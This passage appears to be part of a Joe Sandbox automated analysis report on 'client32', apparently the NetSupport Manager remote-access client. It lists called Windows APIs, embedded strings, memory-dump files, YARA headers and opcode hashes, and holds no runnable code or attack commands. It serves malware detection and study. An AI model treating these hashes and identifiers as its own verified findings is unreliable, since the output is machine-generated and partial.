• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CountTick
• String ID: General$TicklePeriod
• API String ID: 536389180-1546705386
• Opcode ID: 583a630acb21db53e34cc03cdf69896ea0eaf712d7d07d60b781f99cd72e8e82
• Instruction ID: df9d0f281d17993452c850789e07539b87313039e6a264bd0b80c81d914ed6ef
• Opcode Fuzzy Hash: 583a630acb21db53e34cc03cdf69896ea0eaf712d7d07d60b781f99cd72e8e82
• Instruction Fuzzy Hash: FE516234A00705DFE764CF68C994B9AB7E9FB44300F1085AEE55A8B381EB71BA45CB91
APIs
• GetWindowLongA.USER32(?,000000F0), ref: 11077511
• CopyRect.USER32(?,00000004), ref: 1107753F
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
• e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110774F9
• m_hWnd, xrefs: 110774FE
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CopyErrorExitLastLongMessageProcessRectWindowwsprintf
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
• API String ID: 2755825785-2830328467
• Opcode ID: 4f316e2ed6ddaff1f4214695c10b17982f8ef2501de7a4bdebe5d1d49fe5d49c
• Instruction ID: 59158522108a3a71f1e5bb0466e943617169e98ae829cc3baa7e2fe2b27ff523
• Opcode Fuzzy Hash: 4f316e2ed6ddaff1f4214695c10b17982f8ef2501de7a4bdebe5d1d49fe5d49c
• Instruction Fuzzy Hash: 5841C271E00B46DBCB15CF68C9C8B6EB7F1EF44344F10856AD8569B644EBB0E940CB98
APIs
• _memmove.LIBCMT ref: 110D1378
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorExitLastMessageProcess_memmovewsprintf
• String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
• API String ID: 1528188558-323366856
• Opcode ID: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
• Instruction ID: ca0f400cc3ae87bce4a96c7d882a21a9a029a19775e55ac1937322abd3584148
• Opcode Fuzzy Hash: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
• Instruction Fuzzy Hash: 0C212639B007566BDB01CF99EC90F9AF3E5AFD1288F048469E99997701EE31F4058398
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(00000000,0000000E), ref: 11160E88
                                                                                    • Part of subcall function 11160D17: RegOpenKeyExA.ADVAPI32(80000000,CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32,00000000,00020019,?,?), ref: 11160D4F
                                                                                    • Part of subcall function 11160D17: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?), ref: 11160D90
                                                                                    • Part of subcall function 11160D17: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 11160DB4
                                                                                    • Part of subcall function 11160D17: RegCloseKey.ADVAPI32(?), ref: 11160DE1
                                                                                  • LoadLibraryA.KERNEL32(?,?,?,?,?), ref: 11160E4A
                                                                                  • LoadLibraryA.KERNEL32(hhctrl.ocx,?,?,?,?), ref: 11160E60
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                   • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                   • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad$AddressCloseEnvironmentExpandOpenProcQueryStringsValue
                                                                                  • String ID: hhctrl.ocx
                                                                                  • API String ID: 1060647816-2298675154
                                                                                  • Opcode ID: 1515c5a980bb63e1af7bf7099e432547b006d5e2aeed3d9808fec87a56ded119
                                                                                  • Instruction ID: 29a85e5adb823bcef9c03dae075ae2b4ea3bdd8fdf15b4c5e271eae4de8d38be
                                                                                  • Opcode Fuzzy Hash: 1515c5a980bb63e1af7bf7099e432547b006d5e2aeed3d9808fec87a56ded119
                                                                                  • Instruction Fuzzy Hash: DF118E7170423A9BDB05CFA9CD90AAAF7BCEB4C708B00047DE511D3244EBB2E958CB50
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 11005981
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 110059BC
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastMessageProcessReleasewsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                  • API String ID: 3704029381-2830328467
                                                                                  • Opcode ID: c633f50c0fdfeb7c59634bf7decd603260c8dc5fded95eba86501058678fa527
                                                                                  • Instruction ID: 1cf781a21872bd9441bcd9bb2c78fcf7fe1041f1c585c9da4a5e29128da7e192
                                                                                  • Opcode Fuzzy Hash: c633f50c0fdfeb7c59634bf7decd603260c8dc5fded95eba86501058678fa527
                                                                                  • Instruction Fuzzy Hash: 8C21E475A00705AFE710CB61C880BEBB7E4BF8A358F10407DE5AA4B240DB72A440CBA1
                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,1103FE35,?,?,Client,DisableThumbnail,00000000,00000000,Client,DisableWatch,00000000,00000000), ref: 1105D51E
                                                                                  • LeaveCriticalSection.KERNEL32(00000000,?,DisableWatch,00000000,00000000,50D94AA1), ref: 1105D59E
                                                                                  • SetEvent.KERNEL32(?,?,DisableWatch,00000000,00000000,50D94AA1), ref: 1105D5A8
                                                                                  Strings
                                                                                  • Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d, xrefs: 1105D561
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterEventLeave
                                                                                  • String ID: Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d
                                                                                  • API String ID: 3094578987-11999416
                                                                                  • Opcode ID: c530e27155f7b3fdc2e9ca538483d963ca7dcdd1017b1d5184d653da29544702
                                                                                  • Instruction ID: cd8e2c595cb3ca955c0a05eca4a83294a9fb2b4bfc4f95d4b2967c0930ade923
                                                                                  • Opcode Fuzzy Hash: c530e27155f7b3fdc2e9ca538483d963ca7dcdd1017b1d5184d653da29544702
                                                                                  • Instruction Fuzzy Hash: 6D2149B4500B65AFD364CF6AC490967FBF4FF88718700891EE5AA82B41E375F850CBA0
                                                                                  APIs
                                                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B969F
                                                                                  • MoveWindow.USER32(8D111949,?,?,?,?,00000001,?,?,?,?,?,?,?,?,?,110BA885), ref: 110B96D8
                                                                                  • SetTimer.USER32(8D111949,0000050D,000007D0,00000000), ref: 110B9710
                                                                                  Strings
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InfoMoveParametersSystemTimerWindow
                                                                                  • String ID: Max
                                                                                  • API String ID: 1521622399-2772132969
                                                                                  • Opcode ID: ec225463a539bc69afd1be9fe60c0d6d77afb2bfb6e5901e1a463c37379c6f26
                                                                                  • Instruction ID: 87ccea237e2aa79ae125a3322bdb2c24729383307459d143463b3682e3a222a8
                                                                                  • Opcode Fuzzy Hash: ec225463a539bc69afd1be9fe60c0d6d77afb2bfb6e5901e1a463c37379c6f26
                                                                                  • Instruction Fuzzy Hash: A2213DB5A40309AFD714DFA4C885FAFF7B8EB48710F10452EE96597380CB70A941CBA0
                                                                                  APIs
                                                                                  • _memmove.LIBCMT ref: 111535AC
                                                                                  • _memmove.LIBCMT ref: 111535E6
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _memmove$ErrorExitLastMessageProcesswsprintf
                                                                                  • String ID: ..\ctl32\WCUNPACK.C$n > 128
                                                                                  • API String ID: 6605023-1396654219
                                                                                  • Opcode ID: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
                                                                                  • Instruction ID: 7dc9b17917a05d0a1a20c6fa4ac0eb705d74e08118df21bf74e35568faeb592c
                                                                                  • Opcode Fuzzy Hash: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
                                                                                  • Instruction Fuzzy Hash: 0A1125B6C3916577C3818E6A9D85A9BFB68BB4236CF048115FCB817241E771A614C7E0
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(00000000,00000001), ref: 110395E6
                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 110395EE
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                  • API String ID: 1136984157-1986719024
                                                                                  • Opcode ID: 9301bb4a703dc9f718e6a03bc63426bc399485c21c7871a03d02741ec2ccad78
                                                                                  • Instruction ID: 55b3f6273447a840922a2276b3415970a39c2bc3f54fc53508d86eb1e8118ba0
                                                                                  • Opcode Fuzzy Hash: 9301bb4a703dc9f718e6a03bc63426bc399485c21c7871a03d02741ec2ccad78
                                                                                  • Instruction Fuzzy Hash: C3F0C876640219BFD710CE55DCC6F9BB39CEB88754F108425F61597280D6B1E84087A4
                                                                                  APIs
                                                                                  • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 110AB01D
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                  • String ID: ..\ctl32\liststat.cpp$..\ctl32\listview.cpp$m_hWnd
                                                                                  • API String ID: 819365019-2727927828
                                                                                  • Opcode ID: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
                                                                                  • Instruction ID: c68bebcfb275c132091ba8ffe4505af5196cb7164de974b36e44453814cc3cc0
                                                                                  • Opcode Fuzzy Hash: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
                                                                                  • Instruction Fuzzy Hash: 4DF02B34FC0720AFD720D581EC42FCAB3D4AB05709F004469F5562A2D1E5B0B8C0C7D1
                                                                                  APIs
                                                                                  • IsWindow.USER32(?), ref: 110ED498
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastMessageProcessWindowwsprintf
                                                                                  • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$lpNmHdr!=0
                                                                                  • API String ID: 2577986331-1331251348
                                                                                  • Opcode ID: 7e39479067b6c5f95eacce72c06cd62ac8a6f0ae8e6ec8608ac651044464dd8e
                                                                                  • Instruction ID: 93283a680bb1c801d139a1839617fb2f1f19efec68c8bcedb592c4b0da2aa86f
                                                                                  • Opcode Fuzzy Hash: 7e39479067b6c5f95eacce72c06cd62ac8a6f0ae8e6ec8608ac651044464dd8e
                                                                                  • Instruction Fuzzy Hash: 8DF0E279E036327BD612A9177C0AFCFF768DBA1AA9F058061F80D26101EB34720082E9
                                                                                  APIs
                                                                                    • Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F466
                                                                                    • Part of subcall function 1103F450: FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F47C
                                                                                    • Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F484
                                                                                    • Part of subcall function 1103F450: Sleep.KERNEL32(00000014), ref: 1103F497
                                                                                    • Part of subcall function 1103F450: FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F4A7
                                                                                    • Part of subcall function 1103F450: IsWindow.USER32(00000000), ref: 1103F4AF
                                                                                  • IsWindow.USER32(00000000), ref: 1103F4EA
                                                                                  • SendMessageA.USER32(00000000,0000004A,00000000,00000501), ref: 1103F4FD
                                                                                  Strings
                                                                                  • DoMMData - could not find %s window, xrefs: 1103F50D
                                                                                  • PCIVideoSlave32, xrefs: 1103F508
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$Find$MessageSendSleep
                                                                                  • String ID: DoMMData - could not find %s window$PCIVideoSlave32
                                                                                  • API String ID: 1010850397-3146847729
                                                                                  • Opcode ID: aae4a453ef0a99841fb0c8f2bdb4662e73cf68ed11950b93a08a3e71c3a39851
                                                                                  • Instruction ID: 9c7747beff98129d0e206a6ba61550f1bc8c1a2fc0044bc1d9efbb7d24d88507
                                                                                  • Opcode Fuzzy Hash: aae4a453ef0a99841fb0c8f2bdb4662e73cf68ed11950b93a08a3e71c3a39851
                                                                                  • Instruction Fuzzy Hash: BBF02735E8121C77D710AA98AC0ABEEBB689B0170EF004098ED1966280EBB5251087DB
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 110816D7
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastMessageProcess_freewsprintf
                                                                                  • String ID: ..\CTL32\DataStream.cpp$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                  • API String ID: 2441568934-1875806619
                                                                                  • Opcode ID: 447824e72cda998df234909720421efff22f71a3ff5c8715bed7def871f972f3
                                                                                  • Instruction ID: 681d8586094b0eb4f99e23d602ddbaf233b7ff3414f9fb7bc0106feac7c5022a
                                                                                  • Opcode Fuzzy Hash: 447824e72cda998df234909720421efff22f71a3ff5c8715bed7def871f972f3
                                                                                  • Instruction Fuzzy Hash: E8F027B8F083221FEA30DE54BC02BC9F7D01F0824CF080494E9C327240E7B26818C6E2
                                                                                  APIs
                                                                                    • Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,762323A0,1100BF7B), ref: 11110928
                                                                                    • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935
                                                                                  • _free.LIBCMT ref: 1103D221
                                                                                    • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                    • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                    • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010,?), ref: 11110970
                                                                                  • SetPriorityClass.KERNEL32(?,?), ref: 1103D24C
                                                                                  • MessageBeep.USER32(00000000), ref: 1103D25E
                                                                                  Strings
                                                                                  • Show has overrun too much, aborting, xrefs: 1103D1F1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Leave$BeepClassEnterErrorFreeHeapLastMessagePriority_free
                                                                                  • String ID: Show has overrun too much, aborting
                                                                                  • API String ID: 304545663-4092325870
                                                                                  • Opcode ID: 38cbc4052beda61ee506a84b884a1a9d6557445bc312e3507d1d7bbe4ecf2d69
                                                                                  • Instruction ID: 9026de0c3b0683949d6f7ac94f5710338a9a532b2cd303e3c01edb637dee248d
                                                                                  • Opcode Fuzzy Hash: 38cbc4052beda61ee506a84b884a1a9d6557445bc312e3507d1d7bbe4ecf2d69
                                                                                  • Instruction Fuzzy Hash: 50F0B4B4B016139BFB59CBB08914BD9F69DBF8071DF000118E92C97280EB70B224C7D2
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,?), ref: 1101D3EB
                                                                                  • EnableWindow.USER32(00000000,?), ref: 1101D3F6
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
